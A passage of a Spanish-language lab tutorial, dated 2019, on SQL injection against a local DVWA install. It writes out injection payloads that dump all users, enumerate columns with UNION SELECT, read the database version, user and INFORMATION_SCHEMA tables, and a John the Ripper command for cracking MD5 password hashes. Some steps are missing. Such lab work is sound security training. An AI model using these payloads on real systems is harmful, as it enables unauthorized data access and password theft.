Documente Academic
Documente Profesional
Documente Cultură
Fecha: 18/11/2019
1. Descargar e instalar el aplicativo xampp en su version preferencia 5.6.3 o superior siguiendo una
instalacion normal.
6. Buscar la opcion DVWA Security, dar click y cambiar el nivel de Seguridad a low y luego dar click
en submit.
7. Comprobar el cambio de nivel de Seguridad a low en la parte inferior izquierda de la pagina.
9. En el caja de caracteres escribir el siguiente codigo: ' or 1=1 # o ' or '1'='1 el mismo que nos
mostrara todos los usuarios disponibles en la base de datos a atacar.
10. Comprobar cuantas columnas tiene la base de datos a atacar para lo que inyectamos el
siguiente codigo: ' UNION SELECT 1 # ; ' UNION SELECT 1,2 # ; ' UNION SELECT 1,2,3 #; hasta que
la herramienta detecte el error.
11. Para recabar mayor informacion de la base de datos que se esta atacando se ingresa el siguiente
codigo: ' UNION SELECT VERSION(),2 # y ' UNION SELECT USER(),2 # los mismo que nos
muestran la version de la base de datos y el nombre del usuario.
12. Consultamos la estructura de la base de datos extrayendo informacion de las tablas de la misma
con el siguiente codigo: ' UNION SELECT 1,table_name FROM INFORMATION_SCHEMA.TABLES #
13. Escogemos la tabla que mas llame la atencion como “USERS” y consultamos la informacion que
contiene esta tabla con el siguiente codigo: ' UNION SELECT 1,column_name FROM
INFORMATION_SCHEMA.COLUMNS WHERE table_name = 'USERS' #
Como muestra de la captura se detalla las columnas que contiene la table USERS.
user_id
first_name
last_name
user
password
avatar
last_login
failed_login
14. Con la informacion capturada de la table USERS se puede obtener los datos con mas interes para
el atacante para ello se utiliza el siguiente codigo:
15. Para desenmascarar las claves encontradas se debe realizer el siguiente procedimiento.
b) Arrancar el kali linux para crackear md5 con el aplicacion john the ripper comprobando
que el archivo rockyou (diccionario de firmas hash) se encuentre desempaquetado
utilizando el siguiente comando.
c) Para decifrar las firmas hash encontradas en el proceso de inyeccion SQL ejecutamos el
siguiente comando: john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt
md5hash.txt
d) Para mostrar todas las claves ya crackeadas con john the ripper ejecutamos lo que se
muestra en la siguiente imagen.
16. Para insertar informacion en la base de datos comprometida ejecutamos los siguientes pasos.